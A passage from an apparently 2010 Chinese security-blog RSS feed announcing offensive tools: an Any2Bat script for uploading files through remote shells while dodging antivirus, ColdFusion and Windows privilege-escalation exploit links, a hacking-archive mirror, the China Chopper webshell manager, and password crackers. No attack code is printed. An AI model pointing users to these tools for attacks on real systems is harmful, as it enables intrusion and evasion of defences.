face=&quot;宋体&quot;&gt;很久以前写过一个Any2Bat，作用是把任何文件变成echo版，以便通过远程shell上传。&lt;br /&gt;&lt;/font&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://hi.baidu.com/zzzevazzz/blog/item/75b8b50a118b6c1e94ca6b36.html&quot;&gt;&lt;font size=&quot;2&quot; face=&quot;宋体&quot;&gt;http://hi.baidu.com/zzzevazzz/blog/item/75b8b50a118b6c1e94ca6b36.html&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;font size=&quot;2&quot; face=&quot;宋体&quot;&gt;新版本改进如下：&lt;br /&gt;1，增加数据压缩功能（使用系统自带的makecab.exe和expand.exe）。&lt;br /&gt;2，Base64编码采用Microsoft.XMLDOM，速度快，代码更简洁。&lt;br /&gt;3，echo生成临时脚本时文件名不带后缀，避免杀毒软件频繁扫描，提高效率。&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #ff0000&quot;&gt;&lt;strong&gt;&lt;font size=&quot;2&quot; face=&quot;宋体&quot;&gt;代码被服务器上的杀软kill了，没法贴，请移步zzzEVAzzz大锅博客观赏。&lt;/font&gt;&lt;/strong&gt;&lt;/span&gt;&lt;strong&gt;&lt;font size=&quot;2&quot; face=&quot;宋体&quot;&gt;&lt;br /&gt;&lt;/font&gt;&lt;/strong&gt;&lt;font size=&quot;2&quot; face=&quot;宋体&quot;&gt;用法不变。以文件名为参数，或拖放文件到Any2Bat.vbs的图标上。 &lt;br /&gt;文件大小以生成的bat不超过500K为宜。&lt;/font&gt;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Any2bat-New.html&quot; target=&quot;_blank&quot;&gt;继续阅读《新版Any2Bat.vbs》的全文内容...&lt;/a&gt;&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=any2bat&quot;&gt;any2bat&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=VbScript&quot;&gt;VbScript&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=zzzEVAzzz&quot;&gt;zzzEVAzzz&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Any2bat-New.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(0)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/IGUJV-Infection-Guide-Using-Java-VbScript.html&quot;&gt;IGUJV - Infection Guide Using Java/VbScript&lt;/a&gt; (2008-12-13 16:47:36)  &lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/408683330/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~8218154/408683330/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/408683330/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/408683330/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Tue, 31 Aug 2010 04:10:11 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Any2bat-New.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Any2bat-New.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Any2bat-New.html</fs:srclink><fs:srcfeed>http://pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~8218154/408683330/5281982</fs:itemid></item><item><title>Adobe ColdFusion Directory Traversal Vulnerability</title><link>http://item.feedsky.com/~feedsky/pcsec/~8218154/408683331/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=516</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=516&amp;key=117d66fa</trackback:ping><description>&lt;p&gt;&lt;strong&gt;#Trace: &amp;nbsp;用Adobe ColdFusion的不少.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;http://www.exploit-db.com/exploits/14641/&quot; target=&quot;_blank&quot;&gt;http://www.exploit-db.com/exploits/14641/&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;进了后台利用方法:&lt;br /&gt;[1] &lt;a href=&quot;http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/&quot; target=&quot;_blank&quot;&gt;http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/&lt;/a&gt;&lt;br /&gt;[2] &lt;a href=&quot;http://pentestbox.com/wp-content/uploads/2010/08/ColdFusion%E5%90%8E%E5%8F%B0%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95.pdf&quot; target=&quot;_blank&quot;&gt;ColdFusion后台利用方法.pdf&lt;/a&gt; By Mickey&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Adobe-ColdFusion-Directory-Traversal-Vulnerability.html&quot; target=&quot;_blank&quot;&gt;继续阅读《Adobe ColdFusion Directory Traversal Vulnerability》的全文内容...&lt;/a&gt;&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Webapps.html&quot;&gt;Web apps&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=ColdFusion&quot;&gt;ColdFusion&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Directory+Traversal+Vulnerability&quot;&gt;Directory Traversal Vulnerability&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Directory+Traversal&quot;&gt;Directory Traversal&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Adobe-ColdFusion-Directory-Traversal-Vulnerability.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(3)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/More-on-ColdFusion-hacks.html&quot;&gt;More on ColdFusion hacks&lt;/a&gt; (2009-7-5 23:22:6)  &lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/408683331/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~8218154/408683331/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/408683331/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/408683331/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Web apps</category><pubDate>Sat, 14 Aug 2010 21:21:55 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Adobe-ColdFusion-Directory-Traversal-Vulnerability.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Adobe-ColdFusion-Directory-Traversal-Vulnerability.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Adobe-ColdFusion-Directory-Traversal-Vulnerability.html</fs:srclink><fs:srcfeed>http://pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~8218154/408683331/5281982</fs:itemid></item><item><title>Black Hat 2010 Token Kidnapping's Revenge</title><link>http://item.feedsky.com/~feedsky/pcsec/~8218154/408683332/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=515</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=515&amp;key=a92c8290</trackback:ping><description>&lt;p&gt;&lt;strong&gt;#Trace: 提权大杀器,上个月就看到&lt;a href=&quot;http://hi.baidu.com/tr4c3/blog/item/2324b9a18f35ea8647106432.html&quot; target=&quot;_blank&quot;&gt;新闻&lt;/a&gt; 。作者在black hat大会之后把代码公布了。&lt;br /&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Source&lt;strong&gt;: &lt;a href=&quot;https://media.blackhat.com/bh-us-10/source/Cerrudo/Source.zip&quot; target=&quot;_blank&quot;&gt;https://media.blackhat.com/bh-us-10/source/Cerrudo/Source.zip&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;PDF:&lt;br /&gt;[1] https://media.blackhat.com/bh-us-10/whitepapers/Cerrudo/BlackHat-USA-2010-Cerrudo-Toke-Kidnapping%27s-Revenge-wp.pdf&lt;br /&gt;[2] https://media.blackhat.com/bh-us-10/presentations/Cerrudo/BlackHat-USA-2010-Cerrudo-Toke-Kidnapping%27s-Revenge-slides.pdf&lt;/p&gt;&lt;p&gt;This new presentation will detail new design mistakes and security  issues that can be exploited to elevate privileges on all Windows  versions including the brand new Windows 2008 R2 and Windows 7. These  new attacks allow to bypass new Windows services protections such as Per  service SID, Write restricted token, etc. It will be demonstrated that  almost any process with impersonation rights can elevate privileges to  Local System account and completely compromise Windows OSs. &lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;While the issues are not critical in nature since impersonation rights  are required, they allow to exploit services such as IIS 6, IIS 7, SQL  Server, etc.&lt;/span&gt; in some specific scenarios. Exploits code for those  services will be released. The presentation will be given in a very practical way showing how the  new issues were found, with what tools, techniques, etc. allowing the  participants to learn how to easily find these kind security issues in  Windows operating systems.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.blackhat.com/html/bh-us-10/bh-us-10-archives.html&quot; target=&quot;_blank&quot;&gt;http://www.blackhat.com/html/bh-us-10/bh-us-10-archives.html&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;img title=&quot;&quot; alt=&quot;&quot; src=&quot;http://www.pcsec.org/upload/2010/8/201008071040321085.png&quot; onload=&quot;ResizeImage(this,520)&quot; /&gt;&lt;/p&gt;&lt;p&gt;NP编译的：&lt;a target=&quot;_blank&quot; href=&quot;http://pcsec.googlecode.com/files/pr.rar&quot;&gt;http://pcsec.googlecode.com/files/pr.rar&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Black-Hat-2010-Token-Kidnapping-Revenge.html&quot; target=&quot;_blank&quot;&gt;继续阅读《Black Hat 2010 Token Kidnapping's Revenge》的全文内容...&lt;/a&gt;&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Privilege-escalation.html&quot;&gt;Privilege escalation&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Token+Kidnapping&quot;&gt;Token Kidnapping&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Privilege+Escalation&quot;&gt;Privilege Escalation&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Black+Hat&quot;&gt;Black Hat&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Black-Hat-2010-Token-Kidnapping-Revenge.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(6)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Windows-NT-User-Mode-to-Ring-0-Escalation-Vulnerability.html&quot;&gt;Windows NT User Mode to Ring 0 Escalation Vulnerability&lt;/a&gt; (2010-1-20 20:23:44)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Black-Hat-USA-2009-Speaker-Materials.html&quot;&gt;Black Hat USA 2009 Speaker Materials - Updated&lt;/a&gt; (2009-7-31 13:0:24)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Black-Hat-USA-2008-Archives.html&quot;&gt;Black Hat USA 2008 Archives&lt;/a&gt; (2009-4-1 2:28:24)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Multiple-Kaspersky-Products-klim5-sys-Local-Privilege-Escalation-Vulnerability.html&quot;&gt;Multiple Kaspersky Products 'klim5.sys' Local Privilege Escalation Vulnerability&lt;/a&gt; (2009-2-13 3:5:57)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Php168-v2008-Privilege-Escalation-Exploit.html&quot;&gt;Php168 v2008 权限提升漏洞&lt;/a&gt; (2009-1-25 15:25:19)  &lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/408683332/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~8218154/408683332/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/408683332/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/408683332/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Privilege escalation</category><pubDate>Fri, 06 Aug 2010 12:28:50 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Black-Hat-2010-Token-Kidnapping-Revenge.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Black-Hat-2010-Token-Kidnapping-Revenge.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Black-Hat-2010-Token-Kidnapping-Revenge.html</fs:srclink><fs:srcfeed>http://pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~8218154/408683332/5281982</fs:itemid></item><item><title>darkc0de.com Archive</title><link>http://item.feedsky.com/~feedsky/pcsec/~8218154/408683333/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=514</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=514&amp;key=e3a02544</trackback:ping><description>&lt;p&gt;&lt;strong&gt;From &lt;a href=&quot;http://exploit.co.il/hacking/darkc0decom-archive/&quot; target=&quot;_blank&quot;&gt;http://exploit.co.il/hacking/darkc0decom-archive/&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Recently i noticed that darkc0de.com is down&lt;/p&gt;&lt;p&gt;darkc0de.com was a security and hacking related website which  contained a large archive of python (and other scripting&amp;nbsp;languages) &amp;nbsp;  scripts,exploit and tutorials.&lt;/p&gt;&lt;p&gt;It was a great resource for learning and getting custom made tools&lt;/p&gt;&lt;p&gt;For those of you who didn&amp;rsquo;t got the chance to download its content I  attached most of the tools in a single 150 megs tar.gz file.&lt;/p&gt;&lt;p&gt;the file includes the following &amp;nbsp;site sections:&lt;/p&gt;&lt;p&gt;bruteforce,&amp;nbsp;c0de, &amp;nbsp;cheatsheets, &amp;nbsp;encryption, &amp;nbsp;exploits, &amp;nbsp;ircbots,  &amp;nbsp;misc, &amp;nbsp;others, &amp;nbsp;scanners and &amp;nbsp;tutorials&lt;/p&gt;&lt;p&gt;Get it at Megaupload:&lt;/p&gt;&lt;div class=&quot;stb-download_box&quot;&gt;&lt;a onclick=&quot;javascript:pageTracker._trackPageview('/outgoing/www.megaupload.com/?d=0EALCOIV');&quot; href=&quot;http://www.megaupload.com/?d=0EALCOIV&quot; target=&quot;_blank&quot;&gt;Darkc0de.com  Archive Download&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Get it at Rapidshare:&lt;/p&gt;&lt;div id=&quot;_mcePaste&quot;&gt;&lt;div class=&quot;stb-download_box&quot;&gt;&lt;a onclick=&quot;javascript:pageTracker._trackPageview('/outgoing/rapidshare.com/files/407123258/darkc0de.tar.gz.html');&quot; href=&quot;http://rapidshare.com/files/407123258/darkc0de.tar.gz.html&quot; target=&quot;_blank&quot;&gt;Darkc0de.com Archive Mirror&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Darkc0de-Archive-Download.html&quot; target=&quot;_blank&quot;&gt;继续阅读《darkc0de.com Archive》的全文内容...&lt;/a&gt;&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=darkc0de&quot;&gt;darkc0de&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Darkc0de-Archive-Download.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(2)&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Darkc0de-Archive-Download.html#comment&quot; target=&quot;_blank&quot;&gt;还没有相关文章，您来说两句？&lt;/a&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/408683333/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~8218154/408683333/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/408683333/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/408683333/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Mon, 19 Jul 2010 21:09:29 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Darkc0de-Archive-Download.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Darkc0de-Archive-Download.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Darkc0de-Archive-Download.html</fs:srclink><fs:srcfeed>http://pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~8218154/408683333/5281982</fs:itemid></item><item><title>China Chopper @ 20100629</title><link>http://item.feedsky.com/~feedsky/pcsec/~8218154/408683334/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=513</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=513&amp;key=14d4abfb</trackback:ping><description>&lt;p&gt;菜刀最新版20100629&lt;br /&gt;Asp.Net数据库操作更完善，原来连接会超时这次可以再体验一下！&lt;br /&gt;扫描模块更新、浏览器右键加入本IP网页搜索功能、反IDS的加强、其它...&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&lt;a href=&quot;http://www.maicaidao.com&quot; target=&quot;_blank&quot;&gt;http://www.maicaidao.com&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;img title=&quot;&quot; alt=&quot;&quot; src=&quot;http://www.pcsec.org/upload/2010/6/201006290714598636.gif&quot; onload=&quot;ResizeImage(this,520)&quot; /&gt;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/China-Chopper-At-20100629.html&quot; target=&quot;_blank&quot;&gt;继续阅读《China Chopper @ 20100629》的全文内容...&lt;/a&gt;&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=China+Chopper&quot;&gt;China Chopper&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=%E4%B8%AD%E5%9B%BD%E8%8F%9C%E5%88%80&quot;&gt;中国菜刀&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/China-Chopper-At-20100629.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(0)&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/China-Chopper-At-20100629.html#comment&quot; target=&quot;_blank&quot;&gt;还没有相关文章，您来说两句？&lt;/a&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/408683334/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~8218154/408683334/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/408683334/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/408683334/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Tue, 29 Jun 2010 07:13:39 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/China-Chopper-At-20100629.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/China-Chopper-At-20100629.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/China-Chopper-At-20100629.html</fs:srclink><fs:srcfeed>http://pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~8218154/408683334/5281982</fs:itemid></item><item><title>Reliable Weekly Exploit Database Updates</title><link>http://item.feedsky.com/~feedsky/pcsec/~8218154/408683335/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=512</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=512&amp;key=c53e60f0</trackback:ping><description>&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;http://www.exploit-db.com/&quot; target=&quot;_blank&quot;&gt;exploit-db&lt;/a&gt; has finally got around to syncing  our exploits archive and SVN server. Both the downloadable archive and  SVN server will be updated once a week. The date of the last sync can be  found at the top right of our site header. You can check out the latest  exploit entries using the following command:&lt;/p&gt;&lt;div style=&quot;overflow: auto; white-space: nowrap;&quot; class=&quot;codecolorer-container bash blackboard&quot;&gt;&lt;div class=&quot;bash codecolorer&quot;&gt;&lt;em&gt;&lt;strong&gt;&lt;span class=&quot;kw2&quot;&gt;svn&lt;/span&gt; &lt;span class=&quot;kw2&quot;&gt;co&lt;/span&gt; &lt;span class=&quot;kw2&quot;&gt;svn&lt;/span&gt;:&lt;span class=&quot;sy0&quot;&gt;//&lt;/span&gt;www.exploit-db.com&lt;span class=&quot;sy0&quot;&gt;/&lt;/span&gt;exploitdb  exploitdb&lt;/strong&gt;&lt;/em&gt;&lt;/div&gt;&lt;div class=&quot;bash codecolorer&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;bash codecolorer&quot;&gt;&lt;strong&gt;&lt;em&gt;More detail Please visit&lt;/em&gt; &lt;/strong&gt;&lt;a href=&quot;http://www.exploit-db.com/news/&quot; target=&quot;_blank&quot;&gt;http://www.exploit-db.com/news/&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Reliable-Weekly-Exploit-Database-Updates.html&quot; target=&quot;_blank&quot;&gt;继续阅读《Reliable Weekly Exploit Database Updates》的全文内容...&lt;/a&gt;&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Exploit%2Ddb&quot;&gt;Exploit-db&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Offensive&quot;&gt;Offensive&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Security&quot;&gt;Security&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Reliable-Weekly-Exploit-Database-Updates.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(0)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/WinScanX.html&quot;&gt;WinScanX - A free Windows enumeration tool and a must have for any security professional&lt;/a&gt; (2009-12-23 9:7:10)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/microsoft-security-assessment-tool-free-for-windows.html&quot;&gt;Microsoft Security Assessment Tool - Free for Windows&lt;/a&gt; (2008-11-18 22:52:50)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/JavaScript-tutorial-Security.html&quot;&gt;JavaScript tutorial - Security&lt;/a&gt; (2008-8-21 10:31:41)  &lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/408683335/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~8218154/408683335/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/408683335/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/408683335/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Mon, 28 Jun 2010 23:39:12 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Reliable-Weekly-Exploit-Database-Updates.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Reliable-Weekly-Exploit-Database-Updates.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Reliable-Weekly-Exploit-Database-Updates.html</fs:srclink><fs:srcfeed>http://pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~8218154/408683335/5281982</fs:itemid></item><item><title>[update]John the Ripper &amp;amp; hydra</title><link>http://item.feedsky.com/~feedsky/pcsec/~8218154/408683336/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=511</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=511&amp;key=ad36910f</trackback:ping><description>&lt;p&gt;谁共享一下自己的john.pot啊。&lt;/p&gt;&lt;p&gt;John the  Ripper 1.7.6 Released&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://www.openwall.com/john/&quot;&gt;http://www.openwall.com/john/&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Hydra 5.7 Released&lt;br /&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://freeworld.thc.org/thc-hydra/&quot;&gt;http://freeworld.thc.org/thc-hydra/&lt;/a&gt;&lt;/p&gt;&lt;p&gt;新版本的john对phpass-md5的破解速度提高了不少。&lt;/p&gt;&lt;p&gt;Computer:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; AMD Athlon(tm) 64 X2&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Dual-Core Processor TK-57&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1.90 GHz,899 MB of RAM&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Physical Address Extension&lt;br /&gt;&lt;br 